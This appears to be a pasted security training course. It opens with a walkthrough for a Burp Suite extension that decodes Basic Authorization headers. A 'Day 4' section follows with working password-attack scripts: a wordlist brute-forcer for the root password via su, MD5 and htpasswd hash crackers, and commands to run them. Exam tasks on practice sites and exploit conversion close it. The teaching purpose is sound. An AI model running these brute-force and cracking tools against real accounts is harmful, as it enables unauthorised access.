    Download exceptions_fix.py (https://github.com/securityMB/burp-exceptions/blob/master/exceptions_fix.py) to the burp-extensions folder – This will make debugging much easier
    Configure Burp to use Jython – Extender > Options > Python Environment > Select file…

The IBurpExtender module is required for all extensions, while the IMessageEditorTab and IMessageEditorTabFactory will be used to display messages in Burp’s message tab. The base64 module will be used to decode the basic authorization header, and the FixBurpExceptions and sys modules will be used for debugging, which I’ll cover shortly.

Hook into the Burp Extender API to access all of the base classes and useful methods

-------------------------------------------------------------------------------------------------------------------------------------------
class BurpExtender(IBurpExtender, IMessageEditorTabFactory):
    ''' Implements IBurpExtender for hook into burp and inherit base classes.
     Implement IMessageEditorTabFactory to access createNewInstance.
    '''
    def registerExtenderCallbacks(self, callbacks):

        # required for debugger: https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()

        # keep a reference to our callbacks object
        self._callbacks = callbacks

        # obtain an extension helpers object
        # This method is used to obtain an IExtensionHelpers object, which can be used by the extension to perform numerous useful tasks
        self._helpers = callbacks.getHelpers()

        # set our extension name
        callbacks.setExtensionName("Decode Basic Auth")

        # register ourselves as a message editor tab factory
        callbacks.registerMessageEditorTabFactory(self)

        return

    def createNewInstance(self, controller, editable):
        ''' Allows us to create a tab in the http tabs. Returns
        an instance of a class that implements the iMessageEditorTab class
        '''
        return DisplayValues(self, controller, editable)
-----------------------------------------------------------------------------------------------------------------------------------------------------

This class implements IBurpExtender, which is required for all extensions and must be called BurpExtender. Within the required method, registerExtendedCallbacks, the lines self._callbacks and self._helpers assign useful methods from other classes. The callbacks.setExtensionName gives the extension a name, and the callbacks.registerMessageEditorTabFactory is required to implement a new tab. The createNewInstance method is required to create a new HTTP tab. The controller parameter is an IMessageEditorController object, which the new tab can query to retrieve details about the currently displayed message. The editable parameter is a Boolean value that indicates whether the tab is editable or read-only.

Now we can save the file, and load the extension into Burp, which will cause an error.

Load the file: Extender > Extensions > Add > Extension Details > Extension Type: Python > Select file…


Click Next, and it should produce an ugly error.


- Implement nicer looking error messages

To make the error messages readable, add the following to the code:

In the registerExtenderCallbacks method:

-----------------------------------------------------------------------------------------
    def registerExtenderCallbacks(self, callbacks):

        # required for debugger: https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()
-----------------------------------------------------------------------------------------

and at the end of the script:

-----------------------------------------------------------------------------------------
    def createNewInstance(self, controller, editable):
        ''' Allows us to create a tab in the http tabs. Returns
        an instance of a class that implements the iMessageEditorTab class
        '''
        return DisplayValues(self, controller, editable)

FixBurpExceptions()
-----------------------------------------------------------------------------------------

Now the errors should make more sense. To reload the extension, just click the loaded checkbox, unload the extension, and click again to load it.


We'll get another error

The error specifically mentions that with the createNewInstance method the global name DisplayValues is not defined. This error is of course expected since we have not yet created that class, which we will do now. At this point, your script should look like this:

----------------------------------------------------------------------------------------------------------------------------------------------------

# Decode the value of Authorization: Basic header
# Author: Jake Miller (@LaconicWolf)

from burp import IBurpExtender               # Required for all extensions
from burp import IMessageEditorTab           # Used to create custom tabs within the Burp HTTP message editors
from burp import IMessageEditorTabFactory    # Provides rendering or editing of HTTP messages, within within the created tab
import base64                                # Required to decode Base64 encoded header value
from exceptions_fix import FixBurpExceptions # Used to make the error messages easier to debug
import sys                                   # Used to write exceptions for exceptions_fix.py debugging


class BurpExtender(IBurpExtender, IMessageEditorTabFactory):
    ''' Implements IBurpExtender for hook into burp and inherit base classes.
     Implement IMessageEditorTabFactory to access createNewInstance.
    '''
    def registerExtenderCallbacks(self, callbacks):

        # required for debugger: https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()

        # keep a reference to our callbacks object
        self._callbacks = callbacks

        # obtain an extension helpers object
        # This method is used to obtain an IExtensionHelpers object, which can be used by the extension to perform numerous useful tasks
        self._helpers = callbacks.getHelpers()

        # set our extension name
        callbacks.setExtensionName("Decode Basic Auth")

        # register ourselves as a message editor tab factory
        callbacks.registerMessageEditorTabFactory(self)

        return

    def createNewInstance(self, controller, editable):
        ''' Allows us to create a tab in the http tabs. Returns
        an instance of a class that implements the iMessageEditorTab class
        '''
        return DisplayValues(self, controller, editable)

FixBurpExceptions()
---------------------------------------------------------------------------------------------------------------------------------------------------------------

- Create a message tab and access the HTTP headers

The DisplayValues class uses Burp’s IMessageEditorTab to create the custom tab, and ultimately controls the logic for whether the tab gets displayed and its message. This class requires several methods to be implemented for it to work. Here is the code that will create a tab and display all of the request headers:

---------------------------------------------------------------------------------------------------------------------------------------------------------------
class DisplayValues(IMessageEditorTab):
    ''' Creates a message tab, and controls the logic of which portion
    of the HTTP message is processed.
    '''
    def __init__(self, extender, controller, editable):
        ''' Extender is a instance of IBurpExtender class.
        Controller is a instance of the IMessageController class.
        Editable is boolean value which determines if the text editor is editable.
        '''
        self._txtInput = extender._callbacks.createTextEditor()
        self._extender = extender

    def getUiComponent(self):
        ''' Must be invoked before the editor displays the new HTTP message,
        so that the custom tab can indicate whether it should be enabled for
        that message.
        '''
        return self._txtInput.getComponent()

    def getTabCaption(self):
        ''' Returns the name of the custom tab
        '''
        return "Decoded Authorization Header"

    def isEnabled(self, content, isRequest):
        ''' Determines whether a tab shows up on an HTTP message
        '''
        if isRequest == True:
            requestInfo = self._extender._helpers.analyzeRequest(content)
            headers = requestInfo.getHeaders();
            headers = [header for header in headers]
            self._headers = '\n'.join(headers)
        return isRequest and self._headers

    def setMessage(self, content, isRequest):
        ''' Shows the message in the tab if not none
        '''
        if (content is None):
            self._txtInput.setText(None)
            self._txtInput.setEditable(False)
        else:
            self._txtInput.setText(self._headers)
        return
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
If you are following along, paste this code after the BurpExtender class you just created, but be sure to make the FixBurpExceptions() the last line of the script. The comments explain the methods, so I’m only going to focus on the isEnabled and setMessage methods. For more info on this class, you can look at the IMessageEditorTab in the Burp Extender API.

The isEnabled method accepts message contents and the isRequest parameter (which determines whether the message is a request or a response). If the message is a request, the extender helpers extract the request headers, which for the example purposes I assign to the headers variable via a list comprehension and then assign to self._headers as a string (this needs to be a string). I then return the isRequest and self._headers. In the setMessage method, the content will be received and displayed in a new tab. If you reload this extension and make a request, you should now have a new message tab that is displaying the request headers from the requests you make.

Process the headers and populate the message tab

Now that we have access to the headers, you can go ahead and process the headers as you see fit. In this example, we will look for the Authorization: Basic header, and decode it if it is present. We need to make a few changes to the isEnabled and setMessage methods.

--------------------------------------------------------------------------------------------------------------------------------------
isEnabled:


    def isEnabled(self, content, isRequest):
        ''' Determines whether a tab shows up on an HTTP message
        '''
        if isRequest == True:
            requestInfo = self._extender._helpers.analyzeRequest(content)
            headers = requestInfo.getHeaders();
            authorizationHeader = [header for header in headers if header.find("Authorization: Basic") != -1]
            if authorizationHeader:
                encHeaderValue = authorizationHeader[0].split()[-1]
                try:
                    self._decodedAuthorizationHeader = base64.b64decode(encHeaderValue)
                except Exception as e:
                    print e
                    self._decodedAuthorizationHeader = ""
            else:
                 self._decodedAuthorizationHeader = ""
        return isRequest and self._decodedAuthorizationHeader

----------------------------------------------------------------------------------------------------------------------------------------
The changes we are making looks for the header and decodes it. Otherwise it returns an empty string.

----------------------------------------------------------------------------------------------------------------------------------------
setMessage:


    def setMessage(self, content, isRequest):
        ''' Shows the message in the tab if not none
        '''
        if (content is None):
            self._txtInput.setText(None)
            self._txtInput.setEditable(False)
        else:
            self._txtInput.setText(self._decodedAuthorizationHeader)
        return
-----------------------------------------------------------------------------------------------------------------------------------------

The only change made here is displaying the decoded authorization header (self._txtInput.setText(self._decodedAuthorizationHeader)).

- Test run

Once you reload the extension, you should have a functional extension which will display a new HTTP message tab if you visit a site requiring Basic Authentication. To test it out, header over to https://httpbin.org/basic-auth/user/passwd and enter in some fake credentials:

----------------
user: test
pass: test
----------------

and in Burp request you will see under decoded authorization header  test:test

Conclusion

Hopefully this walkthrough was a helpful introduction to writing Burp extensions. Below is the full script. If you don’t understand how it works, I urge you to play around with it, putting in print statements in various places so you can experiment. You print statements will appear in the output subtab within the extender tab.

Full script:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Decode the value of Authorization: Basic header
# Author: Jake Miller (@LaconicWolf)

from burp import IBurpExtender               # Required for all extensions
from burp import IMessageEditorTab           # Used to create custom tabs within the Burp HTTP message editors
from burp import IMessageEditorTabFactory    # Provides rendering or editing of HTTP messages, within within the created tab
import base64                                # Required to decode Base64 encoded header value
from exceptions_fix import FixBurpExceptions # Used to make the error messages easier to debug
import sys                                   # Used to write exceptions for exceptions_fix.py debugging


class BurpExtender(IBurpExtender, IMessageEditorTabFactory):
    ''' Implements IBurpExtender for hook into burp and inherit base classes.
     Implement IMessageEditorTabFactory to access createNewInstance.
    '''
    def registerExtenderCallbacks(self, callbacks):

        # required for debugger: https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()

        # keep a reference to our callbacks object
        self._callbacks = callbacks

        # obtain an extension helpers object
        # This method is used to obtain an IExtensionHelpers object, which can be used by the extension to perform numerous useful tasks
        self._helpers = callbacks.getHelpers()

        # set our extension name
        callbacks.setExtensionName("Decode Basic Auth")

        # register ourselves as a message editor tab factory
        callbacks.registerMessageEditorTabFactory(self)

        return

    def createNewInstance(self, controller, editable):
        ''' Allows us to create a tab in the http tabs. Returns
        an instance of a class that implements the iMessageEditorTab class
        '''
        return DisplayValues(self, controller, editable)

FixBurpExceptions()


class DisplayValues(IMessageEditorTab):
    ''' Creates a message tab, and controls the logic of which portion
    of the HTTP message is processed.
    '''
    def __init__(self, extender, controller, editable):
        ''' Extender is a instance of IBurpExtender class.
        Controller is a instance of the IMessageController class.
        Editable is boolean value which determines if the text editor is editable.
        '''
        self._txtInput = extender._callbacks.createTextEditor()
        self._extender = extender

    def getUiComponent(self):
        ''' Must be invoked before the editor displays the new HTTP message,
        so that the custom tab can indicate whether it should be enabled for
        that message.
        '''
        return self._txtInput.getComponent()

    def getTabCaption(self):
        ''' Returns the name of the custom tab
        '''
        return "Decoded Authorization Header"

    def isEnabled(self, content, isRequest):
        ''' Determines whether a tab shows up on an HTTP message
        '''
        if isRequest == True:
            requestInfo = self._extender._helpers.analyzeRequest(content)
            headers = requestInfo.getHeaders();
            authorizationHeader = [header for header in headers if header.find("Authorization: Basic") != -1]
            if authorizationHeader:
                encHeaderValue = authorizationHeader[0].split()[-1]
                try:
                    self._decodedAuthorizationHeader = base64.b64decode(encHeaderValue)
                except Exception as e:
                    print e
                    self._decodedAuthorizationHeader = ""
            else:
                 self._decodedAuthorizationHeader = ""
        return isRequest and self._decodedAuthorizationHeader

    def setMessage(self, content, isRequest):
        ''' Shows the message in the tab if not none
        '''
        if (content is None):
            self._txtInput.setText(None)
            self._txtInput.setEditable(False)
        else:
            self._txtInput.setText(self._decodedAuthorizationHeader)
        return
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
########################
# Web App Pentest Task #
#######################
Target website:         http://zero.webappsecurity.com/
username:               username
password:               password

Some example solutions can be found at:
https://gist.github.com/mort666/19d3dc1051a71c2c86885e1607d69442


Your tasks:
-----------
1. Create a Google Drive document that will serve as the pentest report and give every student accesss to it
2. Perform all of the web app testing techniques you've learned against the target website and document your findings
3. Download my sample web app pentest reports from this link: https://infosecaddicts-files.s3.amazonaws.com/Sample-WebApp-Pentest-Reports.zip
4. Follow the pentest process described here: https://infosecaddicts-files.s3.amazonaws.com/Web-App-Pentest-Process.pdf
5. See if your pentest process would have yielded the same results as this link: https://gist.github.com/mort666/19d3dc1051a71c2c86885e1607d69442


                           ###########################################
----------- ############### # Day 4: Password cracking and Forensics ############### -----------
                           ###########################################


---------------------------Type This-----------------------------------

nano list.txt

---------------------------Paste This-----------------------------------

hello
goodbye
red
blue
yourname
tim
bob
secureninjapython3
joe
norway!cybersecurity
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------

nano rootbrute.py

---------------------------Paste This-----------------------------------

#!/usr/bin/env python3

import sys
try:
    import pexpect
except(ImportError):
    print("\nYou need the pexpect module.")
    print("http://www.noah.org/wiki/Pexpect\n")
    sys.exit(1)

# Change this if needed.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"


def brute(word):
    print("Trying:", word)
    child = pexpect.spawn('/bin/su')
    child.expect('Password: '.encode("utf-8"))
    child.sendline(word)
    i = child.expect(['.+\s#\s', LOGIN_ERROR, pexpect.TIMEOUT], timeout=3)
    if i == 1:
        print("Incorrect Password")

    if i == 2:
        print("\n\t[!] Root Password:", word, i)
        child.sendline('id')
        print(child.before)
        child.interact()


if len(sys.argv) != 2:
        print("\nUsage : ./rootbrute.py <wordlist>")
        print("Eg: ./rootbrute.py words.txt\n")
        sys.exit(1)

try:
        words = open(sys.argv[1], "r").readlines()
except(IOError):
        print("\nError: Check your wordlist path\n")
        sys.exit(1)

print("\n[+] Loaded:", len(words), "words")
print("[+] BruteForcing...\n")
for word in words:
        brute(word.replace("\n", ""))
-----------------------------------------------------------------------


References you might find helpful:
http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python


---------------------------Type This-----------------------------------
python3 rootbrute.py list.txt
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------


nano md5crack.py


---------------------------Paste This-----------------------------------
 #!/usr/bin/env python3

import hashlib
import sys

if len(sys.argv) != 3:
    print("Usage: ./md5crack.py <hash> <wordlist>")
    sys.exit(1)

pw = sys.argv[1]
wordlist = sys.argv[2]
try:
    words = open(wordlist, "r")
except(IOError):
    print("Error: Check your wordlist path\n")
    sys.exit(1)
words = words.readlines()
print("\n", len(words), "words loaded...")
hashes = {}
for word in words:
    hash = hashlib.md5()
    hash.update(word[:-1].encode('utf-8'))
    value = hash.hexdigest()
    hashes[word[:-1]] = value
for (key, value) in hashes.items():
    if pw == value:
        print("Password is:", key, "\n")
-----------------------------------------------------------------------


Why use hexdigest
http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string


---------------------------Type This-----------------------------------
python3 md5crack.py 8ff32489f92f33416694be8fdc2d4c22 list.txt
-----------------------------------------------------------------------


####### Challenge ########
I will buy lunch (a nice lunch), for the person that can explain how the htcrack.py script works.

Teamwork makes the dreamwork. Google is your friend.
####### Challenge ########


---------------------------Type This-----------------------------------

htpasswd -nd yourname
    - enter yourname as the password


---------------------------Type This-----------------------------------

nano htcrack.py

---------------------------Paste This-----------------------------------
#!/usr/bin/env python3
import crypt
import sys

if len(sys.argv) != 3:
    print("Usage: ./htcrack.py <password> <wordlist>")
    print("ex: ./htcrack.py user:62P1DYLgPe5S6 [path to wordlist]")
    sys.exit(1)

pw = sys.argv[1].split(":", 1)

try:
    words = open(sys.argv[2], "r")
except(IOError):
    print("Error: Check your wordlist path\n")
    sys.exit(1)

wds = words.readlines()
print("\n-d3hydr8[at]gmail[dot]com htcrack v[1.0]-")
print("     - http://darkcode.ath.cx -")
print("\n", len(wds), "words loaded...")

for w in wds:
    if crypt.crypt(w[:-1], pw[1][:2]) == pw[1]:
        print("\nCracked:", pw[0] + ":" + w, "\n")
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 htcrack.py joe:7XsJIbCFzqg/o list.txt
-----------------------------------------------------------------------


########################
# Final Exam Challenge #
########################

Create a Google Drive document to house all of the steps you went through as a class while performing the challenge tasks below:


Malware Analysis Challenge:
---------------------------
Update am.py to look for 2 new classes of malicious capability. Use the links below to help you with finding the appropriate signatures.

https://joesecurity.org/joe-sandbox-reports
https://github.com/Yara-Rules/rules


Exploit Dev Final Challenge:
----------------------------
Choose on of the following exploits below and convert it to the 10 script format like ff.zip on line 1468
http://www.exploit-db.com/exploits/19266/
http://www.exploit-db.com/exploits/18382/
http://www.exploit-db.com/exploits/17527/
http://www.exploit-db.com/exploits/15238/
http://www.exploit-db.com/exploits/15231/
http://www.exploit-db.com/exploits/14623/
http://www.exploit-db.com/exploits/12152/
http://www.exploit-db.com/exploits/11328/
http://www.exploit-db.com/exploits/17649/


Web Application Penest Challenge:
---------------------------------
Perform a web application security assessment on demo.testfire.net and use a report form derived from one of these sample reports: Download my sample web app pentest reports from this link: https://infosecaddicts-files.s3.amazonaws.com/Sample-WebApp-Pentest-Reports.zip

target:     demo.testfire.net
Username:   jsmith
Password:   Demo1234


Python Scripting challenge:
---------------------------
Use lines 989-1230, and the scripts below to create a Python based script that does the following:
1. Checks for the presense of at least 6 testing tools (ex: nmap, propecia) and installs them
2. Runs each tool with the appropriate arguments against the 172.31.2.x network
3. Outputs to a logical text based report format that
https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
https://github.com/codingo/Reconnoitre
https://github.com/1N3/Sn1per
https://github.com/leebaird/discover